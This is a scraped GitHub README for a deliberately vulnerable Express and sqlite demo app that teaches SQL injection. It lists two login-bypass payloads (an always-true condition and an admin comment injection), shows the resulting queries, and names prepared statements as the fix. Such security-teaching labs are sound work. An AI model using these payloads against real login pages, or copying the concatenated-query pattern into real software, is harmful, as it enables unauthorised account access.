SQL injection with Express and sqlite

This application is a demonstration prototype just to show how to perform SQLi attack.

Install

Install nodejs
Install dependencies

$ npm install

Start application

$ npm start

Tutorial

Always True SQLi

Open http://localhost:3000/ and log in with:

username: ' or '1'='1
password: ' or '1'='1

SELECT name FROM user where username = '' or '1'='1' and password = '' or '1'='1'

You are now log in as "User", but you can do better!

SQLi with comment

Open http://localhost:3000/ and log in with:

username: admin'--
password: a

SELECT name FROM user where username = 'admin' --' and password = 'a'

You are now log in as "Admin"

Fix it

use prepared statement

Name		Name	Last commit message	Last commit date
Latest commit History 4 Commits
static		static
view		view
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
app.js		app.js
app.json		app.json
package-lock.json		package-lock.json
package.json		package.json

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

static

static

view

view

.gitignore

.gitignore

LICENSE

LICENSE

README.md

README.md

app.js

app.js

app.json

app.json

package-lock.json

package-lock.json

package.json

package.json

Repository files navigation

SQL injection with Express and sqlite

Install

Tutorial

Always True SQLi

SQLi with comment

Fix it

About

Releases

Packages

Languages

License

0xdbe-appsec/sqli-express-sqlite

Folders and files

Latest commit

History

Repository files navigation

SQL injection with Express and sqlite

Install

Tutorial

Always True SQLi

SQLi with comment

Fix it

About

Resources

License

Stars

Watchers

Forks

Languages